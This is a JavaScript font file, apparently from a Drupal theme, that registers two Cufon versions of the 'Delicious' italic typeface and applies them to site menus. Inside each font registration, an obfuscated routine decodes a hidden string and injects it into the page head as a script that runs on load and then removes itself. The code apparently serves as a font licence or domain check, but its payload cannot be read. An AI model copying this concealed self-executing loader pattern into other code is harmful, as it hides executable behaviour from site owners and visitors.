":"163,-229v4,23,-4,40,-18,55r-61,62r76,103r0,9r-30,0r-71,-95r-15,95r-29,0r36,-227r29,0r-16,103r58,-60v11,-11,13,-23,12,-40","w":163,"k":{"Q":4,"O":4,"G":4,"C":4}},{"d":"13,39v48,0,99,-30,99,-74v0,-38,-50,-29,-79,-20r30,-121r89,0r-3,21r-65,0r-17,73v33,-9,74,2,74,42v-1,61,-70,102,-126,100"},{"d":"72,5v-18,0,-40,-9,-54,-21r37,-234r27,0r-13,87v12,-11,30,-19,47,-19v36,0,50,32,50,64v0,57,-29,123,-94,123xm138,-117v0,-20,-6,-42,-30,-42v-15,0,-32,10,-43,20r-17,108v8,10,20,14,33,14v40,0,57,-68,57,-100","w":182},{"d":"179,-144v0,83,-40,143,-118,172v29,20,67,24,105,11r-6,29v-53,11,-85,-8,-124,-32r-3,-12v15,-8,31,-16,45,-25v-41,-10,-61,-43,-61,-84v0,-57,31,-147,100,-147v48,0,62,48,62,88xm151,-148v0,-25,-6,-60,-38,-60v-52,0,-68,84,-68,124v0,37,17,61,54,66v39,-30,52,-83,52,-130","w":188,"k":{"T":7,".":9}},{"d":"80,-227r-36,227r-29,0r36,-227r29,0","w":85},{"d":"158,-227r-4,24r-78,0r-11,72r61,0r-3,25r-62,0r-17,106r-29,0r36,-227r107,0","w":149,"k":{"o":5,"e":5,"c":5,"a":5,"A":14,".":46,",":46}},{"d":"179,-165v-9,-11,-22,-17,-36,-17v-30,0,-40,53,-40,75v0,11,3,27,17,27v14,0,32,-13,44,-20xm190,-53v-17,1,-33,-11,-28,-30v-13,11,-29,26,-47,26v-24,0,-36,-24,-36,-46v0,-40,15,-99,65,-99v16,0,30,8,39,21r4,-15r23,0r-27,116v0,7,4,10,10,10v32,0,55,-50,55,-77v0,-60,-45,-94,-103,-94v-61,0,-106,55,-106,114v0,63,47,113,111,113v35,0,70,-15,92,-43r16,9v-22,33,-68,54,-108,54v-75,0,-135,-59,-135,-134v0,-69,61,-133,131,-133v68,0,120,44,120,114v0,39,-34,94,-76,94","w":285},{"d":"147,-164r-14,17v-8,-6,-22,-12,-32,-12v-39,0,-57,57,-57,88v0,23,8,55,37,55v13,0,36,-16,46,-25r11,14v-16,17,-41,32,-65,32v-39,0,-57,-35,-57,-69v0,-51,29,-117,88,-117v14,0,32,8,43,17","w":149},{"d":"65,-17v1,26,-44,30,-44,2v-1,-26,44,-30,44,-2xm59,-59r-22,0v-1,-47,32,-90,62,-119v13,-12,31,-50,-1,-50v-27,0,-51,4,-63,-15r17,-18v18,27,93,-9,92,42v-2,37,-34,61,-53,84v-27,32,-26,40,-32,76","w":143},{"d":"153,-113v0,50,-27,118,-86,118v-41,0,-58,-35,-58,-71v0,-50,30,-116,87,-116v41,0,57,33,57,69xm127,-111v0,-23,-6,-48,-34,-48v-40,0,-58,58,-58,90v0,23,7,52,35,52v41,0,57,-62,57,-94"},{"d":"153,-105r-137,0r0,-22r137,0r0,22xm153,-51r-137,0r0,-22r137,0r0,22","w":172},{"d":"118,-176r-28,176r-27,0r24,-150r-45,0r3,-18v25,0,44,-11,73,-8"},{"d":"153,-79r-58,0r0,62r-21,0r0,-62r-58,0r0,-22r58,0r0,-62r21,0r0,62r58,0r0,22","w":169},{"d":"42,-176v0,-41,13,-85,60,-71r-2,19v-28,-6,-29,24,-30,52r29,0r0,20r-30,1v-10,120,-5,165,-50,222r-15,-9v35,-65,25,-103,37,-214r-25,-3r3,-17r23,0","w":96,"k":{"f":9}}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+267-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("&Qz)+i%ArJ{M&sH(wiB1*Q*{3L%)zi{M3Lj1rJy4z58E]!AmSHFz?)8o+ZKD3QBOw!H4Ncw05c5LJsk;r3OkRi)$DHO)?tK;?B5%*[ue@0;b+hOADL;3Wsz?&$jE]QEdj$EZN$]43Jy&&i,x*!fAwWBt@HzHJ4)cJ):m0B:q0!5mWWHQSQ?}?tAO&L]mN4%:+QHA&s*m&0Ole$VEDtVKstcBQ[*j&N?%beSy0$W5J3]zr+Dw@Rf;mhdHi4,lg7EuMq:O1!A)LZkFx(8{o})mN4VE+t):NiOH+iwArsO4eJ*MzmF4+[H:r[?{@ZA(rJ],]mFqr!Aq3mf}b4wZw):M&$8,e!lE+L%;+Q;qDZy8]i5E+QBm+L{m]JjH3sFh+LAljs{lN4yHDZS,+Q{h]3yl+LkMrQ{!wQF;+JWl&JzqDmf(r$OEb1E7r0H4JL%+r5)we3K+r5){&0fl")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":162,"face":{"font-family":"delicious","font-weight":500,"font-style":"italic","font-stretch":"normal","units-per-em":"360","panose-1":"0 0 0 0 0 0 0 0 0 0","ascent":"288","descent":"-72","x-height":"5","bbox":"-22 -279 292 71.2","underline-thickness":"7.2","underline-position":"-46.8","slope":"-11","stemh":"22","stemv":"28","unicode-range":"U+0020-U+007E"}}));
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * -4.0, I1995 Jos Buivenga
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"75,-19v-22,33,-47,52,-69,68r-12,-28v31,-24,35,-28,50,-48v56,-74,48,-178,-9,-222r9,-35v82,61,90,175,31,265","w":122},{"d":"162,49r-162,0r0,-22r162,0r0,22"},{"d":"41,-31v30,10,24,24,12,40v-9,12,-47,43,-47,43r-16,-17v11,-13,30,-37,29,-60v0,0,15,-6,22,-6","w":92,"k":{"T":18,"Q":11,"O":11,"C":11}},{"d":"9,32v48,-3,97,-26,93,-68v-2,-28,-36,-18,-65,-17r-3,-32v32,5,42,-19,64,-31v12,-7,25,-28,4,-32v-11,0,-37,13,-50,18r-11,-26v34,-21,110,-50,110,14v0,26,-27,44,-48,57v14,2,37,10,37,42v-2,62,-54,103,-125,102"},{"d":"111,-264r-5,34r-30,0r-36,252r29,0r-5,34r-62,0r47,-320r62,0","w":103,"k":{"J":-7}},{"d":"69,-112v23,0,58,-14,58,-32v0,-7,-2,-10,-16,-10r-3,-25v0,0,13,-3,26,-3v24,0,33,16,33,34v0,35,-33,57,-63,57r63,91r-49,0r-53,-82r-13,82r-37,0r38,-250r38,0","w":172},{"d":"122,53r-33,0r-87,-326r33,0","w":120},{"d":"168,0r-41,0r-9,-65r-54,0r-29,65r-42,0r106,-227r34,0xm114,-100r-8,-70r-28,70r36,0","w":185,"k":{"y":9,"w":9,"v":9,"Y":16,"W":6,"V":10,"T":14}},{"d":"171,-170r-36,233r-39,0r13,-77v-8,11,-24,19,-37,19v-42,0,-55,-32,-55,-69v0,-48,32,-118,86,-118v30,0,68,12,68,12xm129,-145v-52,-17,-76,41,-73,81v0,14,3,35,21,35v40,-2,45,-73,52,-116","w":186},{"d":"203,-115r-38,0v-26,-47,-44,-78,-53,-93v-8,15,-26,46,-53,93r-38,0r78,-140r26,0v0,0,33,64,78,140","w":224},{"d":"60,-83v-3,-47,-13,-99,-50,-122r27,-27v24,14,47,53,47,89v8,-34,33,-74,65,-91r26,26v-66,41,-77,138,-89,208r-39,0v4,-28,13,-83,13,-83","w":154,"k":{"z":5,"v":5,"u":7,"t":7,"s":7,"q":14,"p":7,"o":16,"n":7,"m":7,"e":16,"c":16,"a":16,"Y":-10,"A":11,";":25,":":25,".":25,"-":18,",":25}},{"d":"175,-166v0,37,-24,75,-62,82r49,67r-2,17r-35,0r-58,-80r-13,80r-40,0r35,-227v63,-1,126,-6,126,61xm135,-163v0,-25,-23,-30,-51,-29r-12,76v33,15,63,-15,63,-47","w":178,"k":{"o":2,"e":2,"c":2,"Y":5,"V":4,"T":5}},{"d":"161,-230v0,0,11,37,-16,64r-55,55r70,94r0,17r-38,0r-56,-79r-12,79r-40,0r35,-227r40,0r-13,84v19,-22,54,-40,47,-79","w":163,"k":{"Q":4,"O":4,"G":4,"C":4}},{"d":"76,-176r-28,185v-8,45,-33,53,-65,62r-4,-29v14,-5,28,-12,30,-29r29,-189r38,0xm37,-220v0,-13,12,-25,26,-25v13,0,24,10,24,23v1,30,-49,33,-50,2","w":83},{"w":108},{"d":"136,-161r-25,31v-10,-11,-23,-7,-37,19v-15,29,-13,75,-21,111r-38,0r27,-176r38,0r-4,26v10,-24,45,-51,60,-11","w":124,"k":{"o":4,"e":4,"c":4,"a":6,".":33,"-":6,",":33}},{"d":"63,-14r-12,77r-39,0r26,-166r-24,14r5,-34r25,-15r5,-38r39,0r-2,13v8,-6,27,-19,39,-19v48,0,57,49,51,87v-6,44,-27,100,-80,100v-14,0,-27,-6,-33,-19xm81,-127v-4,23,-24,99,17,99v26,0,36,-47,39,-66v2,-15,7,-54,-17,-54v-9,0,-31,15,-39,21","w":192},{"d":"84,-227r-34,227r-39,0r33,-227r40,0","w":85},{"d":"179,-141v0,77,-34,134,-99,164v18,21,74,8,89,1r-8,43v0,0,-49,13,-90,-11r-36,-20r-4,-21r38,-17v-36,-13,-52,-46,-52,-83v0,-54,28,-147,98,-147v51,0,64,53,64,91xm140,-145v0,-21,-2,-51,-28,-51v-44,0,-57,77,-57,112v0,31,14,51,42,56v32,-27,43,-74,43,-117","w":188,"k":{"T":7,".":9}},{"d":"21,-47r20,-129r38,0r-21,131v-2,14,2,17,11,17v17,0,36,-26,48,-43r16,-105r38,0r-23,146v-2,12,9,14,9,14r-13,21v0,0,-22,3,-30,-10v-4,-7,-1,-24,-1,-24v-11,16,-32,34,-53,34v-42,0,-43,-25,-39,-52","w":182},{"d":"166,-130r-21,130r-38,0r21,-132v2,-14,-2,-16,-11,-16v-17,0,-37,26,-48,43r-16,105r-38,0r27,-176r39,0r-5,28v10,-17,29,-34,50,-34v42,0,44,25,40,52","w":186},{"d":"94,-222r-19,22v-37,-21,-56,-42,-60,-47r32,-27v0,0,16,27,47,52","w":91},{"d":"191,-227v-21,90,-4,232,-108,232v-55,0,-67,-49,-59,-96r21,-136r40,0r-22,139v-4,28,-5,57,23,57v26,0,39,-25,44,-60r21,-136r40,0","w":195},{"d":"150,-206r-24,20v0,0,-11,-11,-30,-11v-30,0,-42,36,-18,53v26,18,59,29,59,73v0,44,-33,76,-77,76v-31,0,-54,-21,-54,-21r22,-29v0,0,16,15,35,15v31,1,47,-40,21,-58v-25,-17,-66,-39,-60,-80v5,-37,33,-64,74,-64v30,0,52,26,52,26","w":154},{"d":"153,-96r-137,0r0,-31r137,0r0,31xm153,-51r-137,0r0,-31r137,0r0,31","w":172},{"d":"64,-255v6,32,-8,54,-14,79r-21,0v1,-29,-1,-61,10,-79r25,0","w":52},{"d":"120,-176r-26,176r-35,0r21,-139r-39,0r4,-29v26,1,44,-11,75,-8"},{"d":"103,-227v30,0,53,16,53,46v0,30,-20,48,-43,62v68,26,22,125,-45,125v-33,0,-56,-23,-56,-56v0,-29,21,-54,45,-68v-48,-32,-11,-109,46,-109xm86,-137v16,-6,34,-22,35,-39v0,-14,-9,-19,-22,-19v-28,1,-41,48,-13,58xm109,-68v0,-19,-15,-24,-28,-33v-17,9,-31,26,-31,46v0,15,8,28,24,28v20,0,35,-23,35,-41"},{"d":"56,5r-32,0r0,-276r32,0r0,276","w":79},{"d":"160,-226r-6,37r-49,0r-29,189r-39,0r29,-189r-50,0r6,-37r138,0","w":140,"k":{"y":8,"w":9,"u":16,"s":16,"r":16,"o":23,"i":10,"e":23,"c":23,"a":23,"T":-4,"Q":7,"O":7,"G":7,"C":7,"A":14,";":18,":":18,".":18,"-":27,",":18}},{"d":"143,-180v0,0,18,45,-5,84r-57,96r-34,0r-35,-176r40,0r20,126r36,-63v11,-18,2,-51,-2,-59","w":152,"k":{".":18,",":18}},{"d":"230,-180v0,0,16,45,-7,85r-54,95r-36,0r-10,-120v-7,38,-32,85,-46,120r-37,0r-27,-176r41,0r12,125r46,-125r38,0r12,125v14,-38,51,-68,32,-121","w":238,"k":{".":18,",":18}},{"d":"75,5v-42,0,-59,-38,-59,-74v0,-47,32,-113,86,-113v42,0,58,40,58,76v0,47,-31,111,-85,111xm122,-112v0,-16,-3,-36,-24,-36v-34,0,-44,58,-44,84v0,16,3,36,24,36v34,0,44,-58,44,-84","w":175},{"d":"145,-180v11,28,10,62,-5,85v-39,59,-57,142,-134,162r-9,-27v24,-10,39,-21,52,-44r-36,-172r41,0r21,127v20,-40,57,-76,33,-123","w":154,"k":{".":18,",":18}},{"d":"99,-90r-66,70r-24,-21r47,-50r-47,-48r24,-21","w":108},{"d":"85,-250v-8,68,-37,186,-22,244r-36,10v-17,-58,12,-185,20,-254r38,0","w":86},{"d":"176,-227v10,107,-49,157,-80,227r-39,0r-37,-227r42,0r24,168v23,-49,58,-89,49,-168r41,0","w":174,"k":{"y":-4,"o":7,"e":7,"c":7,"a":7,"A":6,";":4,":":4,".":18,",":18}},{"d":"180,-183r-3,36r-29,0r-5,38r23,0r-3,37r-24,0r-9,72r-34,0r9,-72r-24,0r-9,63r-33,0r9,-63r-29,0r5,-37r29,0r4,-38r-25,0r7,-36r23,0r6,-66r34,0r-7,66r24,0r7,-60r33,0r-7,60r28,0xm115,-147r-25,0r-4,38r24,0","w":200},{"d":"187,-211r-67,94r50,117r-45,0r-34,-80r-56,80r-33,0r0,-17r73,-100r-47,-110r43,0r32,74r52,-74r32,0r0,16","w":178},{"d":"168,-227r-5,35r-79,0r-9,56r59,0r-6,36r-59,0r-10,64r83,0r-6,36r-122,0r35,-227r119,0","w":160},{"d":"78,-27v34,0,48,-55,48,-92v0,-42,-43,-28,-55,-7r-15,91v0,0,7,8,22,8xm75,5v-29,0,-57,-24,-57,-24r35,-231r38,0r-13,87v0,0,16,-19,36,-19v37,0,53,28,53,66v0,54,-31,121,-92,121","w":182},{"d":"162,-3v0,0,-17,8,-30,8v-20,-1,-26,-18,-22,-37v0,0,-21,37,-57,37v-29,0,-36,-29,-36,-52v0,-48,28,-135,92,-135v16,0,32,3,53,7v0,6,-18,130,-18,130v-2,12,-4,19,1,19v18,-5,10,15,17,23xm122,-147v-51,-9,-62,67,-65,101v0,9,-1,15,9,15v16,0,42,-38,46,-57v4,-19,10,-59,10,-59","w":176},{"d":"81,5v-44,0,-65,-34,-65,-74v0,-69,63,-141,115,-100v5,-6,5,-69,-3,-71r30,-14v35,50,1,122,-5,184v-4,39,-28,75,-72,75xm126,-136v0,0,-16,-12,-26,-12v-29,0,-45,47,-45,81v0,18,5,40,27,40v44,0,33,-71,44,-109","w":180},{"d":"80,-250v34,0,18,14,18,33v-25,-8,-22,26,-23,41r24,0r0,31r-26,0v-8,81,-4,163,-48,212r-22,-14v29,-54,24,-126,32,-198r-21,-4r4,-27r20,0v0,-29,7,-74,42,-74","w":96,"k":{"l":4,"i":7,"f":9}},{"d":"145,-168v-2,23,-55,147,-60,168r-40,0r-17,-227r42,0r6,160v12,-55,41,-110,59,-160r38,0r8,160v19,-53,57,-84,47,-160r41,0v2,43,-3,74,-18,104r-62,123r-37,0v-3,-79,-13,-130,-7,-168","w":266,"k":{"A":6,";":4,":":4,".":18,"-":6,",":20}},{"d":"67,-21v1,30,-54,36,-54,3v-1,-31,54,-37,54,-3xm81,-123v2,31,-54,38,-53,3v-2,-30,54,-37,53,-3","w":92},{"d":"152,-139v0,43,-63,62,-97,68v-1,17,4,45,23,45v24,0,43,-18,43,-18r16,22v0,0,-26,27,-65,27v-40,0,-56,-36,-56,-71v0,-52,30,-116,89,-116v29,0,47,12,47,43xm113,-141v0,-7,-5,-9,-11,-9v-23,0,-38,30,-43,47v19,-4,54,-14,54,-38","w":157},{"d":"174,-153v-7,51,-55,90,-107,72r-13,81r-40,0r35,-227r51,0v59,0,79,37,74,74xm89,-111v39,4,79,-83,8,-82r-13,0r-12,78v0,0,9,4,17,4","w":174,"k":{"o":4,"e":4,"c":4,"a":4,"A":13,".":52,",":52}},{"d":"146,-176v-2,35,-11,105,-29,136v16,5,24,25,24,40v0,48,-55,69,-90,69v-21,0,-57,-2,-57,-36v0,-36,56,-68,56,-68r15,22v0,0,-32,27,-32,40v0,9,12,11,19,11v23,0,52,-15,52,-35v0,-13,-7,-24,-24,-24r-2,-13v12,-9,13,-12,18,-26v0,0,-20,11,-32,11v-33,0,-46,-25,-46,-54v0,-45,24,-79,72,-79v22,0,56,6,56,6xm108,-149v-34,-10,-54,11,-52,45v0,13,5,20,16,20v28,-2,34,-36,36,-65","w":159},{"d":"127,-233v-25,1,-36,-8,-39,25v-4,38,-10,93,-35,106v23,17,11,72,4,105v-7,33,12,21,33,23r-11,32v-39,0,-60,5,-55,-52v3,-30,24,-93,-12,-95r4,-29v37,0,38,-79,41,-97v12,-56,27,-50,69,-50","w":126,"k":{"J":-7}},{"d":"142,-248v-89,58,-123,204,-38,270r-18,24v-98,-76,-73,-258,56,-330r0,36","w":126,"k":{"J":-7}},{"d":"292,-124v0,77,-77,128,-147,129v-65,1,-124,-41,-124,-109v0,-63,51,-112,111,-124r5,33v-45,12,-82,53,-74,101r97,-82v28,-22,21,-48,-7,-58r9,-21v0,0,54,13,54,50v0,16,-12,34,-30,49r-110,94v55,78,200,14,173,-87r-24,0r-5,-21v0,0,15,-7,26,-7v40,0,46,26,46,53","w":316},{"d":"141,-193r-43,14r25,54r-36,0r-14,-33r-29,35r-31,-10r40,-47r-40,-13r13,-31r36,18r-6,-37r57,0r-18,37r38,-18","w":142},{"d":"143,-156r-22,20v0,0,-13,-13,-35,-13v-28,0,-35,28,-11,35v28,16,63,24,52,72v-6,24,-28,47,-69,47v-26,0,-50,-21,-50,-21r20,-27v9,14,62,25,63,-4v-8,-37,-79,-29,-69,-86v6,-33,37,-49,68,-49v33,0,53,26,53,26","w":148},{"d":"234,-45v0,28,-22,51,-50,51v-28,0,-51,-23,-51,-51v0,-28,23,-51,51,-51v28,0,50,23,50,51xm203,-45v0,-11,-8,-20,-19,-20v-11,0,-20,9,-20,20v0,11,9,20,20,20v11,0,19,-9,19,-20xm116,-194v7,36,-17,62,-49,63v-28,0,-51,-22,-51,-50v0,-41,51,-67,83,-40v27,-5,55,-16,80,-4r-80,225r-35,0r71,-194r-19,0xm86,-181v0,-11,-8,-20,-19,-20v-11,0,-20,9,-20,20v0,11,9,19,20,19v11,0,19,-8,19,-19","w":251},{"d":"99,-41r-24,21r-66,-70r66,-70r24,21r-47,48","w":108},{"d":"148,-273r-142,326r-33,0r139,-326r36,0","w":132,"k":{"\/":36}},{"d":"67,-21v1,30,-54,36,-54,3v-1,-31,54,-37,54,-3","w":92,"k":{"Q":11,"O":11,"G":11,"C":11}},{"d":"144,-180v0,0,13,35,-10,58r-36,36r42,86r-43,0r-25,-59r-44,59r-31,0r0,-15r60,-76r-39,-85r42,0r23,59v13,-17,36,-22,25,-56","w":151},{"d":"128,-35r-5,35r-108,0r36,-227r39,0r-31,192r69,0","w":133,"k":{"y":10,"Y":23,"W":13,"V":16,"T":16}},{"d":"94,-252v-7,1,-32,139,-32,185r-32,0v3,-67,0,-127,22,-181xm67,-21v1,30,-54,36,-54,3v-1,-31,54,-37,54,-3","w":90},{"d":"153,-73r-53,0r0,56r-31,0r0,-56r-53,0r0,-34r53,0r0,-56r31,0r0,56r53,0r0,34","w":169},{"d":"182,-112v-20,104,-67,119,-168,112r36,-227r66,0v55,0,79,45,66,115xm145,-145v2,-35,-20,-54,-61,-47r-25,157v70,14,84,-64,86,-110","w":198},{"d":"235,0r-38,0r20,-132v1,-10,0,-16,-10,-16v-18,0,-45,37,-45,37r-17,111r-38,0r21,-132v2,-10,2,-16,-11,-16v-13,0,-38,28,-46,41r-17,107r-39,0r28,-176r39,0r-5,28v11,-18,29,-34,53,-34v23,0,37,10,37,32v13,-18,28,-32,51,-32v36,0,42,21,37,52","w":277},{"d":"41,-31v30,10,24,24,12,40v-9,12,-47,43,-47,43r-16,-17v11,-13,30,-37,29,-60v0,0,15,-6,22,-6xm81,-123v2,31,-54,38,-53,3v-2,-30,54,-37,53,-3","w":92},{"w":108},{"d":"16,-67v0,-55,42,-115,86,-115v31,0,41,15,45,19r-22,24v0,0,-7,-10,-26,-10v-18,0,-45,37,-45,77v0,26,10,44,27,44v17,0,40,-22,40,-22r17,21v0,0,-27,34,-61,34v-40,1,-61,-32,-61,-72","w":149},{"d":"164,-78v-3,76,-81,97,-149,73r34,-222v56,0,118,-9,119,50v0,27,-20,47,-37,55v22,5,33,21,33,44xm129,-173v2,-24,-23,-21,-46,-21r-8,58v31,3,52,-11,54,-37xm125,-78v-2,-28,-31,-22,-56,-23r-11,69v33,11,69,-11,67,-46","w":178},{"d":"147,-176r-4,30v-33,35,-64,72,-92,111r85,0r-4,35r-129,0r2,-32v27,-39,57,-76,88,-111r-75,0r4,-33r125,0","w":148},{"d":"158,-227r-5,35r-69,0r-9,56r55,0r-5,36r-56,0r-15,100r-40,0r35,-227r109,0","w":148,"k":{"o":5,"e":5,"c":5,"a":5,"A":14,".":46,",":46}},{"d":"121,-198v-44,0,-65,66,-65,113v0,24,8,56,38,56v8,0,23,-3,23,-3r12,-72r38,0r-16,99v0,0,-33,10,-62,10v-54,0,-72,-40,-72,-90v0,-64,40,-147,107,-147v39,0,58,16,58,16r-20,28v0,0,-15,-10,-41,-10","w":186},{"d":"87,-85r-7,50v19,-8,25,-37,7,-50xm75,-147r8,-47v-20,6,-26,33,-8,47xm71,27r-22,0r3,-22v-27,-3,-46,-21,-46,-21r22,-29v0,0,14,11,30,14r10,-69v-21,-14,-49,-37,-44,-68v6,-34,28,-59,64,-63r3,-19r22,0r-3,19v24,5,40,25,40,25r-24,20v0,0,-8,-7,-22,-10r-9,64v20,13,42,27,42,61v0,39,-27,69,-63,75","w":154},{"d":"113,-176r-5,31r-29,0r-16,109v3,18,26,4,33,-4r11,26v-24,30,-87,26,-80,-26r15,-105r-20,-3r5,-28r22,0r4,-32r34,0r-4,32r30,0","w":120},{"d":"76,-176r-27,176r-37,0r26,-176r38,0xm37,-220v0,-13,12,-25,26,-25v13,0,24,10,24,23v1,30,-49,33,-50,2","w":83},{"d":"162,-227r-4,33r-101,157r96,0r-5,37r-139,0r0,-32r100,-158r-68,0r3,-37r118,0","w":159},{"d":"64,-255v6,32,-8,54,-14,79r-21,0v1,-29,-1,-61,10,-79r25,0xm114,-255v6,32,-8,54,-14,79r-20,0v0,-30,-2,-61,9,-79r25,0","w":102},{"d":"191,-76v31,0,46,-40,45,-70v0,-54,-36,-84,-91,-84v-54,0,-95,51,-95,103v0,57,42,100,99,103v45,2,73,-17,94,-38r19,17v-28,32,-65,50,-113,50v-75,-1,-133,-58,-133,-133v0,-69,60,-132,130,-132v77,0,122,44,122,114v-1,52,-37,91,-83,93v-15,0,-30,-11,-31,-25v0,0,-31,24,-49,21v-28,-4,-34,-49,-24,-83v10,-34,25,-60,66,-60v14,0,30,15,30,15r3,-10r30,0r-25,101v-3,8,-2,18,6,18xm172,-162v0,0,-18,-11,-28,-11v-19,0,-27,26,-31,40v-3,10,-14,52,10,46v11,-3,34,-16,34,-16","w":285},{"d":"18,-31v39,-25,78,-47,95,-102v0,-8,-5,-14,-17,-14v-14,0,-26,5,-46,17r-14,-26v23,-16,35,-26,65,-26v21,0,43,6,49,32v10,44,-38,91,-69,115r61,0r-6,35r-116,0"},{"d":"192,-227r-35,227r-41,0r16,-100r-61,0r-16,100r-40,0r35,-227r40,0r-14,91r61,0r15,-91r40,0","w":196},{"d":"153,-111v0,50,-28,116,-85,116v-42,0,-59,-37,-59,-72v0,-47,28,-115,86,-115v42,0,58,36,58,71xm116,-109v0,-21,-6,-38,-25,-38v-30,0,-45,46,-45,77v0,19,6,42,24,42v34,0,46,-48,46,-81"},{"d":"106,-264r-47,320r-62,0r6,-34r29,0r37,-252r-30,0r5,-34r62,0","w":104},{"d":"13,31v52,-28,100,-68,100,-142v0,-19,-6,-37,-23,-37v-25,0,-37,39,-37,62v0,22,20,23,44,23r-31,30v-21,0,-50,-16,-50,-52v0,-47,29,-97,79,-97v43,0,54,41,54,73v-1,80,-62,138,-125,166"},{"d":"84,-227r-35,233v5,35,-56,54,-65,53v0,-12,-11,-31,4,-33v12,-5,21,-11,23,-23r33,-230r40,0","w":85},{"d":"142,-199v-7,37,-70,75,-70,112v0,0,-1,8,-3,20r-33,0v0,-68,51,-90,70,-139v2,-15,-22,-10,-35,-11v-22,0,-37,-22,-37,-22r21,-23v2,8,29,16,47,12v41,0,43,34,40,51xm70,-21v1,30,-54,36,-54,3v-1,-31,54,-37,54,-3","w":142},{"d":"17,-85v0,-73,40,-147,107,-147v40,0,57,16,57,16r-19,28v0,0,-15,-10,-41,-10v-44,0,-64,66,-65,113v0,24,7,56,37,56v21,0,45,-14,45,-14r15,27v-17,13,-43,21,-64,21v-53,0,-72,-40,-72,-90","w":177},{"d":"262,-227r-36,227r-41,0r25,-151v-15,48,-47,106,-69,151r-34,0v-10,-50,-24,-96,-28,-151r-24,151r-41,0r36,-227r48,0v10,57,28,110,33,172v19,-59,57,-117,83,-172r48,0","w":266},{"d":"194,-227r-35,227r-38,0r-44,-158v-3,52,-16,108,-23,158r-40,0r36,-227r46,0r39,151v1,-49,13,-105,19,-151r40,0","w":199},{"d":"11,32v45,-2,93,-25,93,-69v0,-30,-52,-18,-72,-13r28,-126r94,0r-5,33r-59,0r-13,56v30,-7,67,7,66,43v-1,64,-60,102,-126,104"},{"d":"196,-152r-10,50v-21,35,-73,-2,-101,-2v-10,0,-17,5,-40,36r8,-45v12,-12,15,-20,38,-20v26,0,43,19,63,19v10,0,18,-5,42,-38","w":200},{"d":"153,-176r-23,144r22,0r-6,32r-22,0v-5,21,-10,44,-22,62r-29,-12v7,-15,10,-34,14,-50r-81,0v1,-18,3,-36,13,-45v29,-45,62,-89,96,-131r38,0xm106,-115v-19,27,-37,55,-55,83r42,0"},{"d":"120,-232v49,0,64,49,64,90v0,55,-31,147,-99,147v-49,0,-64,-49,-64,-90v0,-55,31,-147,99,-147xm145,-150v0,-19,-4,-46,-29,-46v-44,0,-57,88,-57,120v0,20,4,45,29,45v45,0,57,-87,57,-119","w":196,"k":{"T":7,".":9,",":9}},{"d":"152,-207v-51,28,-95,67,-99,141v0,19,7,38,22,38v27,0,37,-39,37,-62v0,-22,-20,-23,-44,-23r31,-30v21,0,50,16,50,52v0,47,-30,97,-79,97v-42,0,-53,-41,-53,-73v-1,-84,61,-136,124,-166"},{"d":"107,-118r-4,29v-35,1,-34,62,-41,97v-11,56,-28,50,-69,50r-1,-32v25,-3,34,12,39,-25v5,-37,9,-92,34,-105v-21,-18,-10,-74,-3,-106v7,-35,-12,-20,-33,-23r11,-32v39,0,59,-4,54,53v-2,31,-23,93,13,94","w":110},{"d":"90,-77r-71,0r0,-30r71,0r0,30","w":108},{"d":"154,-176v-7,93,-62,181,-114,243r-25,-23v41,-47,85,-120,97,-185r-83,0r6,-35r119,0"},{"d":"126,-182v77,2,25,81,28,128v-5,30,-11,38,-31,59r-23,-19v24,-29,19,-75,28,-117v3,-14,-2,-16,-12,-16v-14,0,-38,26,-47,42r-16,105r-38,0r38,-250r38,0r-16,102v0,0,20,-34,51,-34","w":183}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+282-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})(",Ld)5qxp2esw,9(*Tqu!ALAsv-x)dqswv-Y!2eoOdl%Q>8p_,l%Qc)BRvuj}mlNd$VB3A~Y:rlu)5q}l$8pOca7%l~dJ5JV{5u>fe|l_>eoql8G($LT*,9>3m!$%v9%wk|:7,poBS)j)c.}7cLx9kVd~Y~oGe(:_W.YAcupNrfs.a$@)XfoyxOpBx-K_FOx:5L(p,9A_,rjGya;Qm.)_FO;Q5.):Fqj(5;}9.|uL~AY,FcxSyWora$lev>d25mTkXK7_fV(qOtG3RQBwE:j!8p)-J@N?*%s{+qTp29jOyeAwd_NO5~(:2~cskJp*2e>t>_NE28pEv_K+SOTJT):w,a%ty8GQ5-x75L7EmJo%>qlQ5Lu_5-s_>eY(v9Nf5-pGY9sGFOo(mJWt5Lsf>voG5-@w2Ls8TLN75e$G,edEm_K*2ajQS!QR2r(Oe-x52l)Tyv}52l)s,rKG")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":162,"face":{"font-family":"delicious","font-weight":700,"font-style":"italic","font-stretch":"normal","units-per-em":"360","panose-1":"0 0 0 0 0 0 0 0 0 0","ascent":"288","descent":"-72","x-height":"5","bbox":"-27 -284 292 71","underline-thickness":"7.2","underline-position":"-46.8","slope":"-11","stemh":"35","stemv":"39","unicode-range":"U+0020-U+007E"}}));
;
// JavaScript Document
Cufon.replace('#block-menu-menu-primary-links-front ul', { hover: true, color: '#fff', fontFamily: 'myriadpro' });
Cufon.replace('#block-menu-menu-primary-links-front ul,#block-menu-menu-magazine-primary-menu ul', { fontFamily: 'myriadpro' });
